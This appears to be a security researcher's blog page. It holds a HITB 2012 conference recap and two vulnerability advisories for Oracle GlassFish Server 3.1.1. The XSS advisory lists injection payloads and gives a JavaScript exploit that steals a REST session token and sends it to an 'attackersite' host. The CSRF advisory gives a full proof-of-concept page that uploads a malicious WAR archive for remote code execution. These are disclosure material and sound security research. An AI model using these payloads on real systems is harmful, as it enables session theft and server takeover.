I have promised I would have something written about my <a href="http://conference.hitb.org/hitbsecconf2012ams/">Hack In the Box 2012 Amsterdam</a> conference experience.<br />
<br />
First thing, it was one of the best security conference I have ever been. Big props to Dhillon (<a href="https://twitter.com/#!/l33tdawg">@l33tdawg</a>) and the HITB crew for organising such event. I have been organising conferences in the past (<a href="https://www.owasp.org/index.php/OWASP_New_Zealand_Day_2009">OWASP NZ Day 2009</a> and <a href="https://www.owasp.org/index.php/OWASP_New_Zealand_Day_2010">2010</a>) and I know something about what happens in the background.<br />
<br />
The conference venue was awesome, a pimping five stars hotel ;-) and again need to thank the crew for the wise choice. Bad thing is that I checked out with my wallet "lighter" than usual, after having dinners at the Japanese restaurants and trying all the amenities of the fitness center.
<br />
<br />
My talk (<a href="http://www.security-assessment.com/files/documents/presentations/window_shopping_browser_bug_hunting_in_2012_roberto_suggi_liverani_scott_bell.pdf">pdf</a> || <a href="http://www.slideshare.net/robertosl81/window-shopping-browser-bug-hunting-in-2012">slideshare</a>) was on the first day along with two other media interviews with Mirko Zorz (<a href="https://twitter.com/#!/helpnetsecurity">@helpnetsecurity</a>) of Help Net Security and Edward Kovacs (<a href="https://twitter.com/#!/EduardKovacs">@EduardKovacs</a>) of Softpedia.<br />
<br />
Both interviews went pretty well and they will be published soon. Unfortunately, I wasn't able to see many talks during the first day. However, I have found interesting and entertaining reading the slides of the following presentations:<br />
<br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D1T2%20-%20Itzhak%20Zuk%20Avraham%20and%20Nir%20Goldshlager%20-%20Killing%20a%20Bug%20Bounty%20Program%20-%20Twice.pdf">Killing a bounty program, Twice</a>. - Itzhak (Zuk) Avraham (<a href="https://twitter.com/#!/ihackbanme">@ihackbanme</a>) and Nir Goldshlager (<a href="https://twitter.com/#!/Nirgoldshlager">@Nirgoldshlager</a>)<br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D1T1%20-%20Claudio%20Guarnieri%20-%20One%20Flew%20Over%20the%20Cuckoos%20Nest.pdf">One flew over the cuckoo's nest</a> - Claudio Guarnieri (<a href="https://twitter.com/#!/botherder">@botherder</a>).<br />
<br />
On the second day, I enjoyed Nicolas Gregoire (<a href="https://twitter.com/#!/Agarri_FR">@Agarri_FR</a>)'s talk about "<a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T2%20-%20Nicolas%20Gregoire%20-%20Attacking%20XML%20Processing.pdf">Attacking XML processing</a>". His demo part was very cool and it gave me some new ideas. Attended Steven Seeley (<a href="https://twitter.com/#!/net__ninja">@net__ninja</a>) talk about <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T2%20-%20Steven%20Seeley%20-%20Ghost%20In%20the%20Windows%207%20Allocator.pdf">Ghost In the Windows 7 Allocator</a>, from which I learnt several things I didn't know about Windows heap. Also attended some talks which are unrelated to my current area of research and which resulted to give me some collateral ideas:<br />
<br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T2%20-%20Rahul%20Sasi%20-%20CXML%20VXML%20Auditing%20for%20IVR%20Pentesters.zip">CXML VXML Auditing for IVR Pentesters</a> - Rahul Sasi - <a href="https://twitter.com/#!/fb1h2s">@fb1h2s</a><br />
- <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/D2T1%20-%20Alex%20Bazhanyuk%20and%20Nikita%20Tarakanov%20-%20Automatically%20Searching%20for%20Vulnerabilities.pdf">Automatically Searching for Vulnerabilities</a> - Nikita Tarakanov - <a href="https://twitter.com/#!/NTarakanov">@NTarakanov</a><br />
<br />
All the slides/material of HITB2012AMS material can be found here: <a href="http://conference.hitb.org/hitbsecconf2012ams/materials/">http://conference.hitb.org/hitbsecconf2012ams/materials/</a><br />
<br />
During the conference, I have spent some great time going around Amsterdam with with
<a href="https://twitter.com/#!/net__ninja">@net__ninja</a>.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghVIkVeBvHfR4iAjjy4ZFfjBRlZIvwQOgv2FuKiWZg4RbZFtzUpX7c__SxUCreHbBiYK76XdrbR0Ok4gDDsl8UZoHBVaLQKpfjlPfPGEcFvm0Vyp_oJJyWCX7yK7rN-8O_o8luRDFp304/s1600/ams1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="238" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghVIkVeBvHfR4iAjjy4ZFfjBRlZIvwQOgv2FuKiWZg4RbZFtzUpX7c__SxUCreHbBiYK76XdrbR0Ok4gDDsl8UZoHBVaLQKpfjlPfPGEcFvm0Vyp_oJJyWCX7yK7rN-8O_o8luRDFp304/s400/ams1.jpg" width="400" /></a></div>
<br />
Also met with Peter Van Eeckhoutte (<a href="https://twitter.com/corelanc0d3r">@corelanc0d3r</a>) from the Corelan team, who I need to thank for the <a href="https://www.corelan.be/index.php/2012/05/24/hitb2012ams-day-1-window-shopping/">very cool article he wrote</a> about my talk. I also had few beers with Fred Raynal (<a href="https://twitter.com/#!/fredraynal">@fredraynal</a>) and met new friends, such as Claudio Guarnieri (<a href="https://twitter.com/#!/botherder">@botherder</a>) and Marco Balduzzi (<a href="https://twitter.com/#!/embyte">@embyte</a>).<br />
<br />
After my presentation, I have met with Arthur Gerkis (<a href="https://twitter.com/#!/ax330d">@ax330d</a>) and Christian Holler (<a href="https://twitter.com/#!/mozdeco">@mozdeco</a>) - they both gave me some new ideas for fuzzing browsers, which I expect to adopt and try in the next few months.<br />
<br />
Hopefully, I will have a chance to get an invite to the HITB KUL next year ;-). I will definitely re-submit next year to HITB2013AMS if I got new things to share.<br />
<br />
Finally, all the bugs, demo and exploits which were shown during my preso will be released sometime soon so please keep watching this space or follow my <a href="https://twitter.com/malerisch">tweets</a> if you are interested ;-).<br />
<br />
Other blog posts about HITB2012AMS which you might find relevant:<br />
<br />
<a href="https://www.corelan.be/index.php/category/security/cons-seminars/">https://www.corelan.be/index.php/category/security/cons-seminars/</a>
<br />
<a href="http://blog.rootshell.be/2012/05/24/hitb-amsterdam-wrap-up-day-1/">http://blog.rootshell.be/2012/05/24/hitb-amsterdam-wrap-up-day-1/</a>
<br />
<a href="http://blog.rootshell.be/2012/05/25/hitb-amsterdam-wrap-up-day-2/">http://blog.rootshell.be/2012/05/25/hitb-amsterdam-wrap-up-day-2/</a><br />
<br />Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-17764020889070755882012-04-19T03:30:00.002+02:002012-04-19T03:40:38.892+02:00Oracle GlassFish Server - Multiple Cross Site Scripting VulnerabilitiesFollowing <a href="http://blog.malerisch.net/2012/04/oracle-glassfish-server-rest-csrf.html">disclosure of Oracle bugs</a>, here is another bug found in Oracle GlassFish Server 3.1.1. The interesting part of this advisory is the exploit. When looking at the features of the Oracle GlassFish Server, I have noticed that with a XSS it would be possible to steal the session token and bypass HTTPOnly protection. I have found this condition to be true if a user is authenticated to the REST interface, which does not have the same security controls of the main web administrative interface. Quite an interesting point to keep in consideration when testing applications that come with a standard interface and a REST interface as well.<br />
<b><br />
</b><br />
<b>Details</b><br />
<br />
<b>Vendor Site: </b>Oracle (www.oracle.com)<br />
<span style="font-weight: bold;">Date: </span>April, 19th 2012 – CVE 2012-0551<br />
<span style="font-weight: bold;">Affected Software: </span>Oracle GlassFish Server 3.1.1 (build 12)<br />
<span style="font-weight: bold;">Researcher: </span>Roberto Suggi Liverani<br />
<div><span style="font-weight: bold;">PDF version: </span><a href="http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_Multiple_XSS.pdf">http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_Multiple_XSS.pdf</a></div><br />
<br />
<b>Description</b><br />
<br />
Security-Assessment.com has discovered that components of the Oracle GlassFish Server administrative web<br />
interface are vulnerable to both reflected and stored Cross Site Scripting attacks. All pages where Cross Site<br />
Scripting vulnerabilities were discovered require authentication.<br />
<br />
<b>Reflected Cross Site Scripting </b><br />
<br />
Reflected Cross Site Scripting was discovered in multiple parts of the application. <br />
The table below details where Reflected Cross Site Scripting was detected and which parameters are vulnerable:<br />
<br />
<table border="1" cellpadding="2" cellspacing="2"><tbody>
<tr> <td><b>Page Affected</b></td> <td><b>Method</b></td> <td><b>Variable</b></td> </tr>
<tr> <td> /common/applications/lifecycleEdit.jsf?appName=<br />
test%27);alert(document.cookie)//test<br />
<div><br />
</div></td> <td> GET</td> <td> appName</td> </tr>
<tr> <td>/common/security/realms/realms.jsf?configName=default-config%22%29%3balert%281%29//test<br />
/web/grizzly/networkListeners.jsf?configName=default-configad217%22%29%3balert%281%29//test<br />
/common/security/auditModules/auditModules.jsf<br />
?configName=904895%22);alert(1);//test<br />
/common/security/jacc/jaccProviders.jsf?configName=904895%22);alert(1);//t<br />
/common/security/msgSecurity/msgSecurity.jsf?<br />
configName=904895%22);alert(1);//test<br />
/jms/jmsHosts.jsf?configName=904895%22);alert(1);//test<br />
/web/grizzly/networkListeners.jsf?configName=904895%22);alert(1);//test<br />
/web/grizzly/protocols.jsf?configName=904895%22);alert(1);//test<br />
/web/grizzly/transports.jsf?configName=904895%22);alert(1);//test<br />
<div><br />
</div></td> <td> GET</td> <td> configName</td> </tr>
<tr> <td> /xhp?key=aquarium%27%3b%3Cscript%3Ealert<br />
%281%29%3C/script%3E//test<br />
** Works in Internet Explorer (content sniffing)<br />
<div><br />
</div></td> <td> GET</td> <td> key</td> </tr>
</tbody></table><br />
<b>Stored Cross Site Scripting</b><br />
<br />
The table below details where Stored Cross Site Scripting was detected and which parameters are vulnerable:<br />
<br />
<table border="1" cellpadding="2" cellspacing="2"><tbody>
<tr> <td><b>Page Affected</b></td> <td><b>Rendered Page</b></td> <td><b>Method</b></td> <td><b>Variable</b></td> </tr>
<tr> <td> /management/domain/create-password-alias</td> <td> /management/<br />
domain/<br />
list-password-aliases<br />
/cluster/node/<br />
nodeEdit.jsf?<br />
nodeName=localhost-domain1&bare=true<br />
<div><br />
</div></td> <td> POST</td> <td> id</td> </tr>
<tr> <td>/common/appServer/pswdAliasNew.jsf<br />
** requires a valid javax.faces.ViewState<br />
<div><br />
</div></td> <td> /cluster/node/<br />
nodeEdit.jsf?<br />
nodeName=localhost<br />
domain1&bare=true<br />
<div><br />
</div></td> <td> POST</td> <td> propertyForm%3<br />
ApropertySheet<br />
%3ApropertSection<br />
TextField<br />
%3AaliasNameNew<br />
%3AaliasNameNew</td> </tr>
</tbody></table><br />
<i>Stored Cross Site Scripting - POST Request – REST Interface</i><br />
<br />
<pre class="brush:text; highlight:[7]" name="code" style="font-family: Arial,Helvetica,sans-serif;">POST /management/domain/create-password-alias HTTP/1.1
Host: 192.168.0.205:4848
[snip]
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
AS_ADMIN_ALIASPASSWORD=testing81&id=%22%3E%3Cscript%3Ealert%28%22viaREST%22%29%3B%3C%2Fscrip
t%3E&remove_empty_entries=true
</pre><br />
<i>Stored Cross Site Scripting - POST Request – Standard Web Interface</i><br />
<br />
<pre class="brush:text; highlight:[10]" name="code" style="font-family: Arial,Helvetica,sans-serif;">POST /common/appServer/pswdAliasNew.jsf HTTP/1.1
Host: 192.168.0.205:4848
[snip]
Faces-Request: partial/ajax
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 889
Cookie: JSESSIONID=146c28566608602e3a73ab65f07c; treeForm_tree-hi=treeForm:tree:nodes
propertyForm%3ApropertySheet%3ApropertSectionTextField%3AaliasNameNew%3AaliasNameNew=%22%3E%
3Cscript%3Ealert(12345545)%3C%2Fscript%3E&propertyForm%3ApropertySheet%3ApropertSectionTextF
ield%3AnewPasswordProp%3ANewPassword=test&propertyForm%3ApropertySheet%3ApropertSectionTextF
ield%3AconfirmPasswordProp%3AConfirmPassword=test&propertyForm%3AhelpKey=ref-pswdaliasnew.html&propertyForm_hidden=propertyForm_hidden&javax.faces.ViewState=-6862830673138436308%3A379100040679698460&com_sun_webui_util_FocusManager_focusElementId=prop
ertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.source=propertyForm%3Apr
opertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.execute=%40all&javax.faces.pa
rtial.render=%40all&bare=true&propertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton=pr
opertyForm%3ApropertyContentPage%3AtopButtons%3AnewButton&javax.faces.partial.ajax=true
</pre><br />
<b>Exploitation </b><br />
<br />
These vulnerabilities can be exploited in several ways. One example is to include an external JavaScript file, <br />
such as a JavaScript hook file provided by <a href="https://github.com/beefproject/beef">BeEF, the browser exploitation framework</a>. In this particular case, it <br />
is possible to steal the authentication token through the REST interface, bypassing the HTTPOnly protection adopted for the JSESSIONID token in the standard web administrative interface. <br />
<br />
<b>Bypassing HTTPOnly protection and token theft via REST interface</b><br />
<br />
There is <a href="http://docs.oracle.com/cd/E18930_01/html/821-2416/gjipx.html">a feature</a> in Oracle Glassfish Server which allows using cookie as a session management mechanism instead of Basic Authentication within the REST interface. <br />
<br />
This feature can be misused using a Cross Site Scripting vulnerability. An exploit scenario for both stored and <br />
reflected Cross Site Scripting vulnerabilities would be to inject a JavaScript payload which performs an XMLHTTPRequest (XHR) request to retrieve a valid session token via the REST interface. <br />
<br />
The following exploit can be used to retrieve and steal a session token in case a user is authenticated to the REST Interface, using Basic Authentication. The token can only be used with a cookie named <i>gfresttoken</i> within the REST interface.<br />
<br />
<i>Bypassing HTTPOnly and Stealing Session Token</i><br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;">function retrieveToken()
{
var xmlhttp;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xmlhttp=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
}
xmlhttp.onreadystatechange=function()
{
if (xmlhttp.readyState==4 && xmlhttp.status==200)
{}
}
xmlhttp.open("POST","/management/sessions",true);
xmlhttp.setRequestHeader("Accept","application/json")
xmlhttp.send();
return xmlhttp;
}
function stealToken(a)
{
jsonObj = JSON.parse(a.responseText); // token retrieved and can be sent to attacker
a = document.createElement("IMG");
a.setAttribute('src', 'http://attackersite/?token='+jsonObj.extraProperties.token);
document.body.appendChild(a); // time to grab the token
}
// this exploit works with browsers that have native JSON support
var a = retrieveToken();// perform XHR to retrieve token
setTimeout('stealToken(a);',12000); // needs time to load the token, then sends it to
attackersite
// attacker then needs to set a cookie named gfresttoken with the token value obtained. The
cookie has to be valid for the domain/IP address of the target Oracle Glassfish Server
</pre><br />
<b>Solution</b><br />
<br />
Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory -<br />
April 2012. Security-Assessment.com recommends applying the latest patch provided by the vendor.<br />
For more information, visit: <a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html">http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html</a>Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0tag:blogger.com,1999:blog-5593108060941425908.post-73883065203032949932012-04-19T03:28:00.000+02:002012-04-19T03:28:56.267+02:00Oracle GlassFish Server - REST CSRFTime for some disclosure. Below, details of a CSRF bug discovered in Oracle GlassFish Server 3.1.1 few months ago. Interesting to observe that Oracle rates this as the <a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html#AppendixSUNS">third most critical bug</a> fixed among the Oracle Sun Products. I guess that's because of the exploit which was included in the original report and which I am releasing as part of this advisory. I found a curios angle to exploit this bug, as arbitrary file upload of a WAR archive can be performed. A quite cool way to exploit a CSRF and own Oracle GlassFish, if you ask me :-). Enjoy.<br />
<br />
<b>Details</b><br />
<br />
<b>Vendor Site: </b>Oracle (www.oracle.com)<br />
<span style="font-weight: bold;">Date: </span>April, 19th 2012 – CVE 2012-0550<br />
<span style="font-weight: bold;">Affected Software: </span>Oracle GlassFish Server 3.1.1 (build 12)<br />
<span style="font-weight: bold;">Researcher: </span>Roberto Suggi Liverani<br />
<div><span style="font-weight: bold;">PDF version: </span><a href="http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_REST_CSRF.pdf">http://www.security-assessment.com/files/documents/advisory/Oracle_GlassFish_Server_REST_CSRF.pdf</a></div><br />
<br />
<b>Description</b><br />
<b><br />
</b>Security-Assessment.com has discovered that the Oracle GlassFish Server REST interface is vulnerable to Cross<br />
Site Request Forgery (CSRF) attacks. Although the javax.faces.ViewState is employed in the standard web administrative interface and it prevents such attacks, the REST interface remains vulnerable, as shown in the Proof-of-Concept (PoC) below.<br />
<div style="font-weight: bold;"><br />
</div><div style="font-weight: bold;">Exploitation </div><div style="font-weight: bold;"><br />
</div>Cross Site Request Forgery attacks can target different functionality within an application. In this case, as an example, it is possible to force an authenticated administrator user into uploading an arbitrary WAR archive, which can be used to gain remote code execution on the server running the Oracle GlassFish Server application.<br />
<br />
The Proof-of-Concept (PoC) below has been successfully tested with Firefox 8.0.1 and Chrome 15.0.874.121 with Basic Authentication enabled.<br />
<br />
<i>Arbitrary WAR Archive File Upload – CSRF PoC</i><br />
<pre class="brush:text;" name="code" style="font-family: Arial,Helvetica,sans-serif;"><h1>Oracle GlassFish Server 3.1.1 (build 12) - CSRF arbitrary file upload</h1>by Roberto Suggi Liverani - Security-Assessment.com
This is a Proof-of-Concept - the start() function can be invoked automatically.
The CSRF upload technique used in this case is a slight variation of the technique demonstrated here:
http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html
Other pieces of code were taken from: http://hublog.hubmed.org/archives/001941.html
<button id="upload" onclick="start()" type="button">Upload WAR Archive</button>
<script>
var logUrl = 'http://glassfishserver/management/domain/applications/application';
function fileUpload(fileData, fileName) {
var fileSize = fileData.length,
boundary = "---------------------------270883142628617",
uri = logUrl,
xhr = new XMLHttpRequest();
var additionalFields = {
asyncreplication: "true",
availabilityenabled: "false",
contextroot: "",
createtables: "true",
dbvendorname: "",
deploymentplan: "",
description: "",
dropandcreatetables: "true",
enabled: "true",
force: "false",
generatermistubs: "false",
isredeploy: "false",
keepfailedstubs: "false",
keepreposdir: "false",
keepstate: "true",
lbenabled: "true",
libraries: "",
logReportedErrors: "true",
name: "",
precompilejsp: "false",
properties: "",
property: "",
retrieve: "",
target: "",
type: "",
uniquetablenames: "true",
verify: "false",
virtualservers: "",
__remove_empty_entries__: "true"
}
if (typeof XMLHttpRequest.prototype.sendAsBinary == "function") { // Firefox 3 & 4
var tmp = '';
for (var i = 0; i < fileData.length; i++) tmp +=
String.fromCharCode(fileData.charCodeAt(i) & 0xff);
fileData = tmp;
}
else { // Chrome 9
// http://javascript0.org/wiki/Portable_sendAsBinary
XMLHttpRequest.prototype.sendAsBinary = function(text){
var data = new ArrayBuffer(text.length);
var ui8a = new Uint8Array(data, 0);
for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff);
var bb = new (window.BlobBuilder || window.WebKitBlobBuilder)();
bb.append(data);
var blob = bb.getBlob();
this.send(blob);
}
}
var fileFieldName = "id";
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a
file MIME POST request.
xhr.setRequestHeader("Content-Length", fileSize);
xhr.withCredentials = "true";
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
if (xhr.responseText != "") {
alert(JSON.parse(xhr.responseText).msg);
}
} else if (xhr.status == 0) {
}
}
}
var body = "";
for (var i in additionalFields) {
if (additionalFields.hasOwnProperty(i)) {
body += addField(i, additionalFields[i], boundary);
}
}
body += addFileField(fileFieldName, fileData, fileName, boundary);
body += "--" + boundary + "--";
xhr.sendAsBinary(body);
return true;
}
function addField(name, value, boundary) {
var c = "--" + boundary + "\r\n"
c += 'Content-Disposition: form-data; name="' + name + '"\r\n\r\n';
c += value + "\r\n";
return c;
}
function addFileField(name, value, filename, boundary) {
var c = "--" + boundary + "\r\n"
c += 'Content-Disposition: form-data; name="' + name + '"; filename="' + filename + '"\r\n';
c += "Content-Type: application/octet-stream\r\n\r\n";
c += value + "\r\n";
return c;
}
function getBinary(file){
var xhr = new XMLHttpRequest();
xhr.open("GET", file, false);
xhr.overrideMimeType("text/plain; charset=x-user-defined");
xhr.send(null);
return xhr.responseText;
}
function readBinary(data) {
var tmp = '';
for (var i = 0; i < data.length; i++) tmp += String.fromCharCode(data.charCodeAt(i) &
0xff);
data = tmp;
return tmp;
}
function start() {
var c = getBinary('maliciousarchive.war');
fileUpload(c, "maliciousarchive.war");
}
</script>
</pre><b>Solution</b>
Oracle has created a fix for this vulnerability which has been included as part of Critical Patch Update Advisory -
April 2012. Security-Assessment.com recommends applying the latest patch provided by the vendor.
For more information, visit: <a href="http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html">http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html</a>Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com0